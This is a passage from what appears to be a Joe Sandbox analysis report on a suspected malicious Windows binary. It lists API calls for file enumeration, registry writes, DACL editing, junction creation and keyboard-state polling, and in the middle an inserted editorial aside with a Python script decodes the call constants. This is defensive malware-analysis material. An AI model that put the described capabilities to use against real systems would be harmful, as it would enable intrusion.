• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0052C81D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0052C844
• __swprintf.LIBCMT ref: 0052C890
• __swprintf.LIBCMT ref: 0052C8D3
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
• __swprintf.LIBCMT ref: 0052C927
  • Part of subcall function 004E3698: __woutput_l.LIBCMT ref: 004E36F1
• __swprintf.LIBCMT ref: 0052C975
  • Part of subcall function 004E3698: __flsbuf.LIBCMT ref: 004E3713
  • Part of subcall function 004E3698: __flsbuf.LIBCMT ref: 004E372B
• __swprintf.LIBCMT ref: 0052C9C4
• __swprintf.LIBCMT ref: 0052CA13
• __swprintf.LIBCMT ref: 0052CA62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
• Opcode ID: b5055c5877ac9d93b5f60fe2253cc4265567e99373fd9fbf042be2e5b427963d
• Instruction ID: 39d0d84b89fe03e00c4bbf5762b36b359a4d1dead9b5f82df2966641ccb9fb0b
• Opcode Fuzzy Hash: b5055c5877ac9d93b5f60fe2253cc4265567e99373fd9fbf042be2e5b427963d
• Instruction Fuzzy Hash: 70A13FB5408344ABC750EFA5C885EAFB7ECFF95708F40091EF58587191EA34DA08CB66
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0052EFB6
• _wcscmp.LIBCMT ref: 0052EFCB
• _wcscmp.LIBCMT ref: 0052EFE2
• GetFileAttributesW.KERNEL32(?), ref: 0052EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 0052F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0052F026
• FindClose.KERNEL32(00000000), ref: 0052F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 0052F04D
• _wcscmp.LIBCMT ref: 0052F074
• _wcscmp.LIBCMT ref: 0052F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 0052F09D
• SetCurrentDirectoryW.KERNEL32(00578920), ref: 0052F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0052F0C5
• FindClose.KERNEL32(00000000), ref: 0052F0D2
• FindClose.KERNEL32(00000000), ref: 0052F0E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 54ac61d0b9803bc5aca8d6fe52515904bf4ed21b3d779fc3b9f0e1b7e4f384e4
• Instruction ID: d79a31b3b0906b0326f312293cd3dcb5a2acd30382d171125a591c5c198dac5f
• Opcode Fuzzy Hash: 54ac61d0b9803bc5aca8d6fe52515904bf4ed21b3d779fc3b9f0e1b7e4f384e4
• Instruction Fuzzy Hash: 2231F23A5002287ACB149FA5FC4CAEE7BBCAF4A325F004176E806D30D1DB70DA44DB65
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00540953
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0054F910,00000000,?,00000000,?,?), ref: 005409C1
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00540A09
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00540A92
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00540DB2
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00540DBF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: ed80254965f9388a4d2b0a2deb42b7ba72d676417d0baabb3ef23873ed6f2c68
                                                                                                                      • Instruction ID: 3254715055e9d8ccf00a2f8c01fcea2d31bade72cdb0c4dbf0ee084574b250ef
                                                                                                                      • Opcode Fuzzy Hash: ed80254965f9388a4d2b0a2deb42b7ba72d676417d0baabb3ef23873ed6f2c68
                                                                                                                      • Instruction Fuzzy Hash: 7902BF35600611AFCB54EF15C844E6ABBE5FF89718F04885DF98A9B3A2CB34EC04CB95
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0DV$0EV$0FV$3cM$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGV$_M
                                                                                                                      • API String ID: 0-2295610144
                                                                                                                      • Opcode ID: e0b627e8bfb836dcc6718a3ae53ac6ca94aaa9a24cae1c13ab88d8790bfc05f0
                                                                                                                      • Instruction ID: 0ee479830e8d36acb4d179151ae2e37087a6896e51a58daeb67bd2701e238fd6
                                                                                                                      • Opcode Fuzzy Hash: e0b627e8bfb836dcc6718a3ae53ac6ca94aaa9a24cae1c13ab88d8790bfc05f0
                                                                                                                      • Instruction Fuzzy Hash: A8728F75E006198BDB14CF59C8907EEBBB5FF48710F1581ABE919EB380E7349981CB98
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0052F113
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F128
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F13F
                                                                                                                        • Part of subcall function 00524385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005243A0
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0052F16E
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F179
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0052F195
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F1BC
                                                                                                                      • _wcscmp.LIBCMT ref: 0052F1D3
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0052F1E5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00578920), ref: 0052F203
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0052F20D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F21A
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052F22C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: 2f44acb69e246bbf218962437d0abc74fa3c27c75f893253d44fba2fb87e87e6
                                                                                                                      • Instruction ID: 80f75da3cc84ad9785f992fe124f59bdd9a1f2ef5ed0d92dc0921b2bfcdacad4
                                                                                                                      • Opcode Fuzzy Hash: 2f44acb69e246bbf218962437d0abc74fa3c27c75f893253d44fba2fb87e87e6
                                                                                                                      • Instruction Fuzzy Hash: D831C23A500229BACB109FA4FC49EEE7BBCAF47365F100175E905A21E0DB30DA45DF64
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0052A20F
                                                                                                                      • __swprintf.LIBCMT ref: 0052A231
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0052A26E
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0052A293
                                                                                                                      • _memset.LIBCMT ref: 0052A2B2
                                                                                                                      • _wcsncpy.LIBCMT ref: 0052A2EE
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0052A323
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0052A32E
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0052A337
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0052A341
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      • Opcode ID: fab20ba724007ea3cb42cf18b0c11f5efc6dec94bc9a38226cdc1980a07fe283
                                                                                                                      • Instruction ID: eea8b40ea0497923255258baf728a29eee69bf6b8c82c8c4bb81950a9d453d3a
                                                                                                                      • Opcode Fuzzy Hash: fab20ba724007ea3cb42cf18b0c11f5efc6dec94bc9a38226cdc1980a07fe283
                                                                                                                      • Instruction Fuzzy Hash: 5B31C0B5904119ABDB20DFA5DC49FEB37BCBF8A705F1040B6F508D21A0E77496448B25
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00518202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0051821E
                                                                                                                        • Part of subcall function 00518202: GetLastError.KERNEL32(?,00517CE2,?,?,?), ref: 00518228
                                                                                                                        • Part of subcall function 00518202: GetProcessHeap.KERNEL32(00000008,?,?,00517CE2,?,?,?), ref: 00518237
                                                                                                                        • Part of subcall function 00518202: HeapAlloc.KERNEL32(00000000,?,00517CE2,?,?,?), ref: 0051823E
                                                                                                                        • Part of subcall function 00518202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00518255
                                                                                                                        • Part of subcall function 0051829F: GetProcessHeap.KERNEL32(00000008,00517CF8,00000000,00000000,?,00517CF8,?), ref: 005182AB
                                                                                                                        • Part of subcall function 0051829F: HeapAlloc.KERNEL32(00000000,?,00517CF8,?), ref: 005182B2
                                                                                                                        • Part of subcall function 0051829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00517CF8,?), ref: 005182C3
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00517D13
                                                                                                                      • _memset.LIBCMT ref: 00517D28
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00517D47
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00517D58
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00517D95
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00517DB1
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00517DCE
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00517DDD
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00517DE4
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00517E05
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00517E0C
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00517E3D
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00517E63
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00517E77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 384c3ec7385960b773eb9339f9e7dacb9b136e803102685cfa579cd04d47f737
                                                                                                                      • Instruction ID: 1acbe22f06f03db257eb313d447279f7ff4c3d7b466b58f104bb264471a6c1b9
                                                                                                                      • Opcode Fuzzy Hash: 384c3ec7385960b773eb9339f9e7dacb9b136e803102685cfa579cd04d47f737
                                                                                                                      • Instruction Fuzzy Hash: 44617E75900109AFEF10CFA8DC48EEEBBB9FF48304F148269E815A7291DB319A45DB60
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00520097
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00520102
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00520122
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00520139
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00520168
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00520179
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 005201A5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 005201B3
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 005201DC
                                                                                                                      • GetKeyState.USER32(00000012), ref: 005201EA
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00520213
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00520221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 3935c28afaafacd5c37af48132eb896f6b3b6f70cc3c442d8a7f7b7be71d7a35
                                                                                                                      • Instruction ID: 379b299becc9fcb1d9d10980bd6d675b948f6a0416fbb110c9d0e46f59858481
                                                                                                                      • Opcode Fuzzy Hash: 3935c28afaafacd5c37af48132eb896f6b3b6f70cc3c442d8a7f7b7be71d7a35
                                                                                                                      • Instruction Fuzzy Hash: DD511C349067A829FB34DBA0A8587EAFFB4BF13380F48559EC5C1561C3DA649B8CC761
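The API listings above print every argument as a bare hex value, so the constants that actually tell an analyst what a function does are easy to misread: the DeviceIoControl code 000900A4 in the reparse-point function, the 02200000 and 02000080 flag words passed to CreateFileW, the 00000004 passed to GetUserObjectSecurity in the DACL-editing function, the 00000002 type passed to RegSetValueExW, and the virtual-key codes 000000A0, 000000A1, 00000011, 00000012 and 0000005B polled by the GetAsyncKeyState/GetKeyState function. The decoder below is an added example written for reading this report; it is not code from the report, from Joe Sandbox or from the analysed sample. The line grammar it parses (Name.Module(arg,arg,...), ref: address) is inferred from the listing, the constant names are the Windows SDK ones, and the CTL_CODE split follows the documented layout (device type in bits 16..31, access in bits 14..15, function in bits 2..13, method in bits 0..1). With it, 000900A4 resolves to device type 9 (FILE_DEVICE_FILE_SYSTEM) function 41, which is FSCTL_SET_REPARSE_POINT, and 02200000 to FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT; together with CreateDirectoryW, the "\??\%s" format string and the RemoveDirectoryW cleanup on the error path, that is the standard directory-junction creation sequence. The key codes decode to VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN only, i.e. modifier-state tracking of the kind an input-synthesis routine needs; reading that as keystroke capture would be an over-interpretation, and that reading is the editor's, not a finding stated by the report.

```python
"""Decode the argument constants that appear in a Joe Sandbox "APIs" listing.

Added example for reading this report; it is not code from the report, the sandbox
or the analysed sample. The line grammar is inferred from the listing
(Name.Module(arg,arg,...), ref: address); the constant names are Windows SDK names.
"""
import re

# One listing line: API name, module, comma-separated hex args (no 0x prefix), call site
_LINE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Constant tables (Windows SDK values)
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CREATE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
                0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}
FSCTL_NAMES = {(9, 41): "FSCTL_SET_REPARSE_POINT"}   # FILE_DEVICE_FILE_SYSTEM = 9
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
SECURITY_INFO = {1: "OWNER_SECURITY_INFORMATION", 2: "GROUP_SECURITY_INFORMATION",
                 4: "DACL_SECURITY_INFORMATION", 8: "SACL_SECURITY_INFORMATION"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}


def parse_api_line(line):
    """Return {'api','module','args','ref'} for a listing line, or None for lines without a call."""
    m = _LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": m.group("ref")}


def as_int(tok):
    """Listing args are bare hex; '?' or a string literal means the value was not static."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def decode_ctl_code(code):
    """Split an IOCTL into its CTL_CODE(DeviceType, Function, Method, Access) fields."""
    return {"device": (code >> 16) & 0xFFFF, "function": (code >> 2) & 0xFFF,
            "method": code & 0x3, "access": (code >> 14) & 0x3}


def flags_from_mask(value, table):
    """Name every bit of `value` found in `table`; unknown remaining bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names


def decode_call(call):
    """Decode the arguments that carry meaning for the APIs seen in this report."""
    api, vals = call["api"], [as_int(a) for a in call["args"]]
    out = {}
    if api == "DeviceIoControl" and len(vals) > 1 and vals[1] is not None:
        f = decode_ctl_code(vals[1])
        out["ioctl"] = FSCTL_NAMES.get((f["device"], f["function"]), f)
    elif api == "CreateFileW" and len(vals) >= 6 and None not in vals[1:6]:
        out["access"] = flags_from_mask(vals[1], ACCESS)
        out["share"] = flags_from_mask(vals[2], SHARE)
        out["disposition"] = DISPOSITION.get(vals[4], vals[4])
        out["flags"] = flags_from_mask(vals[5], CREATE_FLAGS)
    elif api in ("GetAsyncKeyState", "GetKeyState") and vals and vals[0] is not None:
        out["vk"] = VK.get(vals[0], hex(vals[0]))
    elif api in ("GetUserObjectSecurity", "SetUserObjectSecurity") and len(vals) > 1 and vals[1] is not None:
        out["security_information"] = flags_from_mask(vals[1], SECURITY_INFO)
    elif api == "RegSetValueExW" and len(vals) > 3 and vals[3] is not None:
        out["type"] = REG_TYPES.get(vals[3], vals[3])
    return out


# Lines copied from the listing above; the last one has no call syntax and is skipped
LISTING = [
    "RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00540A92",
    "Part of subcall function 00524385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005243A0",
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0052A293",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0052A323",
    "GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0051821E",
    "GetAsyncKeyState.USER32(000000A0), ref: 00520122",
    "GetKeyState.USER32(0000005B), ref: 00520221",
    "_wcscmp.LIBCMT ref: 0052F128",
]


def decode_listing(lines=LISTING):
    """Return (api, ref, decoded) for each line that parsed to a call with something to decode."""
    rows = []
    for line in lines:
        call = parse_api_line(line)
        if call:
            decoded = decode_call(call)
            if decoded:
                rows.append((call["api"], call["ref"], decoded))
    return rows


if __name__ == "__main__":
    for api, ref, decoded in decode_listing():
        print(f"{ref}  {api:<22} {decoded}")
```

Run it against any block of "APIs" lines pasted from the report; unknown APIs come back with an empty decode rather than a guess, and unrecognised flag bits are left as hex so a wrong table entry cannot silently swallow them.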
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00540E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005404AC
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0054054B
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005405E3
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00540822
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0054082F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: 1f3ceec9e05e2a90b500effad9c474237b2cbf86a7e9efceac82f93524917e42
                                                                                                                      • Instruction ID: 80b8696cc053c7adae8224f05ccbe5a88889e0af3dd9e3166e5eec32b6730a09
                                                                                                                      • Opcode Fuzzy Hash: 1f3ceec9e05e2a90b500effad9c474237b2cbf86a7e9efceac82f93524917e42
                                                                                                                      • Instruction Fuzzy Hash: ACE17F35204200AFCB14DF29C895E6ABBE5FF89318F14896DF94ADB2A1D630EC05CB91
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: be04715e5e930fb0b41453439092703de6967584d708ee48b65a623dcedc859d
